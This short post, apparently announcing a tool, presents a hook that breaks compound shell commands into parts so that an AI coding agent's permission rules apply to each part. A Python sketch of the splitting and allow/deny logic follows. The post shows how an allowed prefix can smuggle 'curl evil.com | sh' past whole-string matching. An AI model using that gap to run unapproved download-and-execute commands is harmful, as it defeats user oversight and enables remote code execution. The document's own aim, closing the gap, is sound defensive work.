I built this after noticing that Claude Code's Bash permission patterns match the whole command string. If you allow "git status", then "git status && curl evil.com | sh" also gets auto-approved.
This hook (single Python file, no deps) runs as a PreToolUse hook and decomposes compound commands (&&, ||, ;, |, $(), backticks) into individual sub-commands, then checks each one against your existing allow/deny patterns.
- Any sub-command hits a deny pattern -> whole command denied
- All sub-commands must match allow patterns for auto-approve
- Unknown sub-commands fall through to the normal permission prompt
Setup is a curl + one JSON block in settings. MIT licensed.
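A minimal sketch of the decomposition and decision rules described above, added here as an illustration; it is not the hook's own code. The plain-glob patterns, the function names and the `allow`/`deny`/`ask` return values are assumptions, not Claude Code's actual pattern syntax or hook protocol.

```python
import fnmatch

OPERATORS = ("&&", "||", ";", "|")  # the separators listed in the post
ALLOW = ["git status*", "echo *"]   # constructed sample patterns (plain globs)
DENY = ["rm -rf *"]

def split_subcommands(cmd):
    """Pieces between && || ; | plus, recursively, the bodies of $(...) and
    backticks. Simplified: no escapes, heredocs, background & or newlines."""
    parts, cur, quote, i, n = [], [], None, 0, len(cmd)
    while i < n:
        c = cmd[i]
        if quote != "'" and (c == "`" or cmd.startswith("$(", i)):
            if c == "`":
                j = cmd.find("`", i + 1)
                inner, j = (cmd[i + 1:], n) if j < 0 else (cmd[i + 1:j], j + 1)
            else:
                depth, j = 1, i + 2
                while j < n and depth:
                    depth += (cmd[j] == "(") - (cmd[j] == ")")
                    j += 1
                inner = cmd[i + 2:j - 1] if depth == 0 else cmd[i + 2:]
            parts += split_subcommands(inner)  # substitution body also runs
            cur.append(cmd[i:j])               # outer command kept as written
            i = j
            continue
        if quote:
            quote = None if c == quote else quote
        elif c in "'\"":
            quote = c
        else:
            op = next((o for o in OPERATORS if cmd.startswith(o, i)), None)
            if op:
                parts.append("".join(cur).strip())
                cur, i = [], i + len(op)
                continue
        cur.append(c)
        i += 1
    parts.append("".join(cur).strip())
    return [p for p in parts if p]

def decide(cmd, allow=ALLOW, deny=DENY):
    """deny if any piece hits a deny glob; allow only if every piece hits an
    allow glob; otherwise ask (fall through to the normal prompt)."""
    hit = lambda s, pats: any(fnmatch.fnmatchcase(s, p) for p in pats)
    subs = split_subcommands(cmd)
    if any(hit(s, deny) for s in subs):
        return "deny"
    return "allow" if subs and all(hit(s, allow) for s in subs) else "ask"
```

Matched as one string, `git status && curl evil.com | sh` satisfies the `git status*` glob; split into pieces, only the first piece does, so the command falls through to the prompt.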